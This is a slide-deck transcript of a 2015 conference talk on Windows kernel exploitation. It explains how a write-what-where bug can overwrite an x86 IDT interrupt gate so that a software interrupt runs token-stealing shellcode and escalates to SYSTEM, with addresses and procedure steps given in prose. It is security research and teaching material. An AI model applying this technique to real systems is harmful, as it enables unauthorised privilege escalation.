abusing interrupts for reliable windows kernel exploitation (en)
TRANSCRIPT
Abusing Interrupts for Reliable Windows Kernel Exploitation
2015/11/14
AVTOKYO2015
inaz2
About me
• inaz2
• Security engineer & Python programmer• Working at NTT Communications
• Weblog “momoiro technology”• http://inaz2.hatenablog.com/
2
Windows kernel exploitation
• Attacks that exploit the vulnerability in the kernel land• Including the vulnerability in device drivers
• Write-what-where condition/vulnerability is widely used• Enables to write an arbitrary value to the arbitrary address
• Execute the shellcode to escalate privilege of the attacking process• Then launch the administrator command prompt
3
Classic technique: halDispatchTable overwrite
• nt!NtQueryIntervalProfile internal API• call [nt!halDispatchTable+4] via nt!KeQueryIntervalProfile
• Overwrite [nt!halDispatchTable+4] to shellcode
4
Replace token shellcode
• Copy the token object from System process (PID=4)
5
Replace 41414141h to the attacking process’ PID
It works but …
• Depending on the implementation of nt!NtQueryIntervalProfile• Kernel implementation may be changed in the future (i.e. not reliable)
• Is there the more reliable target to overwrite?
6
It works but …
• Depending on the implementation of nt!NtQueryIntervalProfile• Kernel implementation may be changed in the future (i.e. not reliable)
• Is there the more reliable target to overwrite?
7
x86 interrupt handling
• There are hardware interrupts (keyboard etc.) and software interrupts (zero division etc.)• Software interrupts are triggered by “int n” instruction
• Interrupt Descriptor Table (IDT)• Stores the addresses of hander functions (Interrupt Software Routines; ISR)
in each entry (interrupt gate)
• ISRs are executed in Ring 0• Can do everything
8
x86 privilege levels (protection rings)
• 4 privilege levels numbered from 0 to 3• The greater number means lesser privileges
• Most OS including Windows use only two rings• Ring 0 corresponding to kernel mode and Ring 3 to user mode
9
Interrupt Descriptor Table (1/4)
• Intel Developer’s Manual Volume 3, Chapter 6
10
Interrupt Descriptor Table (2/4)
• Intel Developer’s Manual Volume 3, Chapter 6
11
Can be interrupted from Ring 3 if DPL=3
Interrupt Descriptor Table (3/4)
• WinDbg (KD) view
12
Interrupt Descriptor Table (4/4)
• Overwrite the interrupt gate for interrupt #0
13
414184fc
000884fc 4141ee00
DPL=3
IDT overwrite technique
14
Get the IDT address
Overwrite the interrupt gate for interrupt #n
Trigger interrupt #n by “int n” instruction
Execute shellcode
Detailed procedure
16
Find the write-what-where vulnerability
• Write and install the vulnerable device driver• Enables to attack write-what-where vulnerability via IOCTL
17
Get the IDT address (1/2)
18
Can be used even in Ring 3!
Get the IDT address (2/2)
• The function that returns the IDT address
19
Disable alignment
Write the Interrupt Software Routine (ISR)
• Switch the value of fs segment register• 0x33 (TEB) → 0x30 (KPCR)
• Call the shellcode right after ISR
• Return by iretd instruction instead of ret
20
Allocate memory & put the codes
• Allocate nop-sled from 0x41410000 to 0x41420000
• Put the ISR code + shellcode from 0x41420000
21
Overwrite the interrupt gate
• Write 0x4141ee00 to the latter half of the interrupt gate for interrupt #32• #32-255 are designated as user-defined interrupts (not reserved)
22
Trigger the software interrupt
• Execute “int 32”• Shellcode is executed via ISR
• Then launch cmd.exe
23
Demo
24
What about 64 bit Windows?
• The size of interrupt gate increases to 16 bytes
• As 0x100000000 bytes nop-sled is quite hard, overwriting entire interrupt gate is required (i.e. write 2 times)
• However, my VirtualBox VM hangs up when the interrupt is triggered (PatchGuard??)
25
Comparison with halDispatchTable overwrite
• Pros• Reliable against all versions of x86-based Windows
• Easy to determine the address to be overwritten
• Cons• Need to prepare the ISR code
• Need to allocate nop-sled
• Not confirmed on 64 bit
26
Recap
• IDT overwrite technique is reliable against all versions of x86-based Windows• Independent with kernel implementation changes
• We can get the IDT address even in Ring 3
• There’s more than one way to do it
27
References
• Windowsでデバイスドライバの脆弱性からの権限昇格をやってみる -ももいろテクノロジー• http://inaz2.hatenablog.com/entry/2015/09/15/121926
• Project Zero: One font vulnerability to rule them all #4: Windows 8.1 64-bit sandbox escape exploitation• http://googleprojectzero.blogspot.jp/2015/08/one-font-vulnerability-to-rule-
them-all_21.html
• Interrupt Service Routines - OSDev Wiki• http://wiki.osdev.org/Interrupt_Service_Routines
• SIMPLE IS BETTER: Kernel Information Leak with Unprivileged Instructions (SIDT, SGDT) on x86 - WHY ?• http://hypervsir.blogspot.jp/2014/10/kernel-information-leak-with.html
28
Thank you!inaz2
29